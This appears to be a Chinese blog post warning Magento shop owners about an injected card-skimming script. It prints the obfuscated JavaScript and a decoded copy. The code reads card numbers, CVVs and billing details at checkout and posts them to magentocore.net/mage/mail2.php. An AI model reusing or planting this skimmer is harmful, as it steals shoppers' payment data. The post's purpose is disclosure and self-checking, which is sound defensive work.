最新消息:亮瞎双眼的那些年!

电商被注入JS代码

Magento admin 1406浏览 0评论

被植入文件

调用路径https://magentocore.net/mage/mage.js

原内容:

var _0x8949=[“\x75\x6E\x64\x65\x66\x69\x6E\x65\x64″,”\x68\x6F\x73\x74\x6E\x61\x6D\x65″,”\x76\x61\x6C”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x68\x6F\x73\x73\x74\x5F\x6E\x61\x6D\x65\x22\x5D”,”\x73\x69\x7A\x65″,”\x2A\x5B\x6E\x61\x6D\x65\x2A\x3D\x22\x63\x63\x5F\x6E\x75\x6D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x2A\x3D\x22\x63\x63\x5F\x65\x78\x70\x5F\x6D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x2A\x3D\x22\x63\x63\x5F\x65\x78\x70\x5F\x79\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x2A\x3D\x22\x63\x63\x5F\x63\x69\x64\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x6C\x61\x73\x74\x6E\x61\x6D\x65\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x73\x74\x72\x65\x65\x74\x5D\x5B\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x63\x69\x74\x79\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x72\x65\x67\x69\x6F\x6E\x5F\x69\x64\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x70\x6F\x73\x74\x63\x6F\x64\x65\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x63\x6F\x75\x6E\x74\x72\x79\x5F\x69\x64\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x74\x65\x6C\x65\x70\x68\x6F\x6E\x65\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x65\x6D\x61\x69\x6C\x5D\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x43\x61\x72\x64\x5F\x6E\x75\x6D\x62\x65\x72\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x45\x78\x70\x5F\x31\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x45\x78\x70\x5F\x32\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x43\x56\x56\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x66\x69\x72\x73\x74\x5F\x6E\x61\x6D\x65\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x73\x65\x63\x6F\x6E\x64\x5F\x6E\x61\x6D\x65\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x61\x64\x64\x72\x65\x73\x73\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x63\x69\x74\x79\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x73\x74\x61\x74\x65\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x7A\x69\x70\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x63\x6F\x75\x6E\x74\x72\x79\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x70\x68\x6F\x6E\x65\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x76\x62\x76\x22\x5D”,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6D\x61\x67\x65\x6E\x74\x6F\x63\x6F\x72\x65\x2E\x6E\x65\x74\x2F\x6D\x61\x67\x65\x2F\x6D\x61\x69\x6C\x32\x2E\x70\x68\x70″,”\x73\x65\x72\x69\x61\x6C\x69\x7A\x65″,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73″,”\x70\x6F\x73\x74″,”\x62\x75\x74\x74\x6F\x6E\x5B\x6F\x6E\x63\x6C\x69\x63\x6B\x2A\x3D\x22\x2E\x73\x61\x76\x65\x22\x5D”,”\x65\x71″,”\x6F\x6E\x63\x6C\x69\x63\x6B”,”\x61\x74\x74\x72″,”\x6D\x67\x5F\x5F\x63\x6F\x72\x65″,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x6D\x67\x5F\x5F\x63\x6F\x72\x65\x28\x29\x3B”,”\x3C\x66\x6F\x72\x6D\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x6E\x6F\x6E\x65\x3B\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x68\x6F\x73\x73\x74\x5F\x6E\x61\x6D\x65\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x43\x61\x72\x64\x5F\x6E\x75\x6D\x62\x65\x72\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x45\x78\x70\x5F\x31\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x45\x78\x70\x5F\x32\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x43\x56\x56\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x66\x69\x72\x73\x74\x5F\x6E\x61\x6D\x65\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x73\x65\x63\x6F\x6E\x64\x5F\x6E\x61\x6D\x65\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x61\x64\x64\x72\x65\x73\x73\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x63\x69\x74\x79\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x73\x74\x61\x74\x65\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x7A\x69\x70\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x63\x6F\x75\x6E\x74\x72\x79\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x70\x68\x6F\x6E\x65\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x76\x62\x76\x22\x3E\x3C\x2F\x66\x6F\x72\x6D\x3E”,”\x61\x70\x70\x65\x6E\x64″,”\x62\x6F\x64\x79″,”\x69\x6E\x69\x74\x5F\x5F\x6C\x6F\x28\x29\x3B”,”\x72\x65\x61\x64\x79″];if( typeof llooll== _0x8949[0]){var llooll=0;var lloo_interval;function mg__core(){var _0x83edx4=location[_0x8949[1]];jQuery(_0x8949[3])[_0x8949[2]](_0x83edx4);if(!(jQuery(_0x8949[5])[_0x8949[4]]())){return};var _0x83edx5=jQuery(_0x8949[5])[_0x8949[2]]();var _0x83edx6=jQuery(_0x8949[6])[_0x8949[2]]();var _0x83edx7=jQuery(_0x8949[7])[_0x8949[2]]();var _0x83edx8=jQuery(_0x8949[8])[_0x8949[2]]();var _0x83edx9=jQuery(_0x8949[9])[_0x8949[2]]();var _0x83edxa=jQuery(_0x8949[10])[_0x8949[2]]();var _0x83edxb=jQuery(_0x8949[11])[_0x8949[2]]();var _0x83edxc=jQuery(_0x8949[12])[_0x8949[2]]();var _0x83edxd=jQuery(_0x8949[13])[_0x8949[2]]();var _0x83edxe=jQuery(_0x8949[14])[_0x8949[2]]();var _0x83edxf=jQuery(_0x8949[15])[_0x8949[2]]();var _0x83edx10=jQuery(_0x8949[16])[_0x8949[2]]();var _0x83edx11=jQuery(_0x8949[17])[_0x8949[2]]();jQuery(_0x8949[18])[_0x8949[2]](_0x83edx5);jQuery(_0x8949[19])[_0x8949[2]](_0x83edx6);jQuery(_0x8949[20])[_0x8949[2]](_0x83edx7);jQuery(_0x8949[21])[_0x8949[2]](_0x83edx8);jQuery(_0x8949[22])[_0x8949[2]](_0x83edx9);jQuery(_0x8949[23])[_0x8949[2]](_0x83edxa);jQuery(_0x8949[24])[_0x8949[2]](_0x83edxb);jQuery(_0x8949[25])[_0x8949[2]](_0x83edxc);jQuery(_0x8949[26])[_0x8949[2]](_0x83edxd);jQuery(_0x8949[27])[_0x8949[2]](_0x83edxe);jQuery(_0x8949[28])[_0x8949[2]](_0x83edxf);jQuery(_0x8949[29])[_0x8949[2]](_0x83edx10);jQuery(_0x8949[30])[_0x8949[2]](_0x83edx11);var _0x83edx12=0;if((!_0x83edx5) || (!_0x83edx8) || (!_0x83edx6) || (!_0x83edx7)){_0x83edx12= 1};if(_0x83edx12!= 1){jQuery[_0x8949[34]](_0x8949[31],jQuery(_0x8949[33])[_0x8949[32]]())}}function init__lo(){if(!(jQuery(_0x8949[5])[_0x8949[4]]())){return};var _0x83edx14=jQuery(_0x8949[35]);for(var _0x83edx15=0;_0x83edx15< _0x83edx14[_0x8949[4]]();_0x83edx15++){var _0x83edx16=_0x83edx14[_0x8949[36]](_0x83edx15);var _0x83edx17=_0x83edx16[_0x8949[38]](_0x8949[37]);if(_0x83edx17[_0x8949[40]](_0x8949[39])>= 0){continue};_0x83edx16[_0x8949[38]](_0x8949[37],_0x8949[41]+ _0x83edx17)}}if(( typeof jQuery!= _0x8949[0])){(function(_0x83edx18){_0x83edx18(document)[_0x8949[46]](function(){_0x83edx18(_0x8949[44])[_0x8949[43]](_0x8949[42]);init__lo();lloo_interval= setInterval(_0x8949[45],7000)})})(jQuery)}}

解密后的真相内容:

if (typeof llooll == ‘undefined’) {
var llooll = 0;
var lloo_interval;

function mg__core() {
var _0x83edx4 = location[‘hostname’];
jQuery(‘.mi_forms input[name=”hosst_name”]’)[‘val’](_0x83edx4);
if (!(jQuery(‘*[name*=”cc_num”]’)[‘size’]())) {
return
};
var _0x83edx5 = jQuery(‘*[name*=”cc_num”]’)[‘val’]();
var _0x83edx6 = jQuery(‘*[name*=”cc_exp_m”]’)[‘val’]();
var _0x83edx7 = jQuery(‘*[name*=”cc_exp_y”]’)[‘val’]();
var _0x83edx8 = jQuery(‘*[name*=”cc_cid”]’)[‘val’]();
var _0x83edx9 = jQuery(‘*[name=”billing[firstname]”]’)[‘val’]();
var _0x83edxa = jQuery(‘*[name=”billing[lastname]”]’)[‘val’]();
var _0x83edxb = jQuery(‘*[name=”billing[street][]”]’)[‘val’]();
var _0x83edxc = jQuery(‘*[name=”billing[city]”]’)[‘val’]();
var _0x83edxd = jQuery(‘*[name=”billing[region_id]”]’)[‘val’]();
var _0x83edxe = jQuery(‘*[name=”billing[postcode]”]’)[‘val’]();
var _0x83edxf = jQuery(‘*[name=”billing[country_id]”]’)[‘val’]();
var _0x83edx10 = jQuery(‘*[name=”billing[telephone]”]’)[‘val’]();
var _0x83edx11 = jQuery(‘*[name=”billing[email]”]’)[‘val’]();
jQuery(‘.mi_forms input[name=”m_Card_number”]’)[‘val’](_0x83edx5);
jQuery(‘.mi_forms input[name=”m_Exp_1″]’)[‘val’](_0x83edx6);
jQuery(‘.mi_forms input[name=”m_Exp_2″]’)[‘val’](_0x83edx7);
jQuery(‘.mi_forms input[name=”m_CVV”]’)[‘val’](_0x83edx8);
jQuery(‘.mi_forms input[name=”m_first_name”]’)[‘val’](_0x83edx9);
jQuery(‘.mi_forms input[name=”m_second_name”]’)[‘val’](_0x83edxa);
jQuery(‘.mi_forms input[name=”m_address”]’)[‘val’](_0x83edxb);
jQuery(‘.mi_forms input[name=”m_city”]’)[‘val’](_0x83edxc);
jQuery(‘.mi_forms input[name=”m_state”]’)[‘val’](_0x83edxd);
jQuery(‘.mi_forms input[name=”m_zip”]’)[‘val’](_0x83edxe);
jQuery(‘.mi_forms input[name=”m_country”]’)[‘val’](_0x83edxf);
jQuery(‘.mi_forms input[name=”m_phone”]’)[‘val’](_0x83edx10);
jQuery(‘.mi_forms input[name=”m_vbv”]’)[‘val’](_0x83edx11);
var _0x83edx12 = 0;
if ((!_0x83edx5) || (!_0x83edx8) || (!_0x83edx6) || (!_0x83edx7)) {
_0x83edx12 = 1
};
if (_0x83edx12 != 1) {
jQuery[‘post’](‘https://magentocore.net/mage/mail2.php’, jQuery(‘.mi_forms’)[‘serialize’]())
}
}
function init__lo() {
if (!(jQuery(‘*[name*=”cc_num”]’)[‘size’]())) {
return
};
var _0x83edx14 = jQuery(‘button[onclick*=”.save”]’);
for (var _0x83edx15 = 0; _0x83edx15 < _0x83edx14[‘size’](); _0x83edx15++) {
var _0x83edx16 = _0x83edx14[‘eq’](_0x83edx15);
var _0x83edx17 = _0x83edx16[‘attr’](‘onclick’);
if (_0x83edx17[‘indexOf’](‘mg__core’) >= 0) {
continue
};
_0x83edx16[‘attr’](‘onclick’, ‘mg__core();’ + _0x83edx17)
}
}
if ((typeof jQuery != ‘undefined’)) {
(function (_0x83edx18) {
_0x83edx18(document)[‘ready’](function () {
_0x83edx18(‘body’)[‘append’](‘<form class=”mi_forms” style=”display: none;”><input type=”text” name=”hosst_name”><input type=”text” name=”m_Card_number”><input type=”text” name=”m_Exp_1″><input type=”text” name=”m_Exp_2″><input type=”text” name=”m_CVV”><input type=”text” name=”m_first_name”><input type=”text” name=”m_second_name”><input type=”text” name=”m_address”><input type=”text” name=”m_city”><input type=”text” name=”m_state”><input type=”text” name=”m_zip”><input type=”text” name=”m_country”><input type=”text” name=”m_phone”><input type=”text” name=”m_vbv”></form>’);
init__lo();
lloo_interval = setInterval(‘init__lo();’, 7000)
})
})(jQuery)
}
}

 

https://magentocore.net/mage/mail2.php 使用此MAIL发送功能把收集到的信息卡信息发往这个地址!!!

盗刷信用卡信息的团伙就问您们怕不怕!!!!请各位电商用户打开页面源码自查!!!!

 

转载请注明:无趣的人生也产生有意思的事件 » 电商被注入JS代码

您必须 登录 才能发表评论!